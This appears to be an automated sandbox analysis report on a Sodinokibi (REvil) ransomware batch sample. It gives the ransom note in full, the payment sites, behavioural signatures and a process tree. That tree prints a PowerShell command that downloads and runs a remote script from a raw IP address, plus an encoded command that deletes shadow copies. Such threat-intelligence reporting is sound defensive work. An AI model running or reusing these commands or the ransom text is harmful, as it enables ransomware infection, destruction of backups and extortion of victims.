Analysis

  • max time kernel
    139s
  • resource
    win7v191014
  • submitted
    25-12-2019 09:10

General

  • Target

    phS7sDeA.bat

  • Sample

    191225-l9n5txl4f2

  • SHA256

    0d92c7aceb162dd4ca758f9336c3b8ddcfb23ddf8401d5e0512fc8475dbdf629

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/phS7sDeA

Extracted

Language
ps1
Source

Extracted

Path

C:\mm7rg-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension mm7rg. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/55E8C7ABB7EBAF59 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/55E8C7ABB7EBAF59 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: RmPYQUi/pgkcMwKm4qemneCFmlUZo7oA3srOpB6ea0ZME5WPDZKWc8Mw8mfQS7f0 2NGzSARk4wdj4UUtF4folUbVx+FchtG5mam5KL9/zEaR7NC4+x5AZQlWAenu97lk 83t7mbS0DH+pQho0DAscGfBMXmX0NTu2TikHpA/WmFykVgHKduan6DDqT/9ipcXZ QoWz0bQ/7ayecnion4VVD5xhDyi6CI9AdoRGYkgkdj47kpo/Q3hH7nABPfK3HIEh a6gClLsUu3DerDWvpr8MDAcyLvR97ADCzFgmq1wABpzl5DCaBHW0+HWdxQcsj9SD 9LR9n2WyvuSzPFVgLjfexd4RtdZBzyhoLnAVL9BKpE3Q+n2sx50rMLIbKGRO0QCP GisL1GavQFMuchJhwXQ9A9oofLIz5Ijw69jhXB45pk2VbCDwftX0n4uhQq8etnM8 yM1ZJ8ma6/7kXHrP4/vJfcZ9/6mfqwmWohb/PhRu/Jrn1kqEdMc2v83eDiy60x7b ZCDDV/A/ncJuPfVV8akq04dMz9NUVvGlALE/GZ8bn4xsPNnCD9RHVzVjqiOy27et fHy3YnjXucLrxjzXX7ii8DhHUomI1hrVKd1zfLq8CX9eOViveG83d2eBGaTGHPiC pOUA63Hj3O5zTS2BIU1y8MkzvDg6zBuzj2kOl1pgOH+zr7OlugXMlA6CioOFbCv2 xOJa4bCVb8O0u8XT9oVDmgfVMtjhiknm2BTvflWHEl8/VqMoFclTF/vYwS7ym2XZ Y2Kz6Cfw52byAMknlJF471MjlZJrELdb783phvxdd1H9ABlLEnz3xgLJaMTb8sak 20nq4S1TFwla+ooxVZh21rJ06887lgF+XmJiilXvEHSWX4dOHtUhXWtc+OgdpwAG jVKplvvEn5n+mk8cOga6d4U0OHQ+6BU7EE1HfkhIBY6yLjHgFDQjH7+uYYqY8gwQ YPq6PuHKjeiWMC9KRu+vVFUM/B4DlTiya5rC7ywAI9U21EEWpdNlFUaiJwN1F/27 qmLTkF6WmVBRC6xC6HIVUmajdZ8hBLvnBUjnNNVevEE6XgW1YyN9gVXpQv/uH94c aj3a4son9uiW/tp8ZyT1i3p7tiJSe0Tsmlm1swQinsSNKP/3pCPZdUr2T+9n8Qn3 giKDkiqZnXO+5Q== Extension name: mm7rg ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/55E8C7ABB7EBAF59

http://decryptor.top/55E8C7ABB7EBAF59

Signatures

  • Suspicious use of WriteProcessMemory 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Drops file in Program Files directory 33 IoCs
  • Drops file in System32 directory 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\phS7sDeA.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:1552
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/phS7sDeA');Invoke-SVOKPX;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Discovering connected drives
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in Program Files directory
      • Drops file in System32 directory
      PID:1436
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Discovering connected drives
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:936
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1816

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4628e689-d195-4873-bc54-2194d7d68777

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_512b5fbe-a222-4c41-85f8-7f61ee5ca5bd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c6be20a0-2b44-41e6-b03e-788e1380648b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c85534f7-abc2-478b-a265-18e03f17967d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_eb154db7-5347-459d-a5ae-f27e0827e401

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef13c2a6-fcdf-474f-b686-be9a419bd5e9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms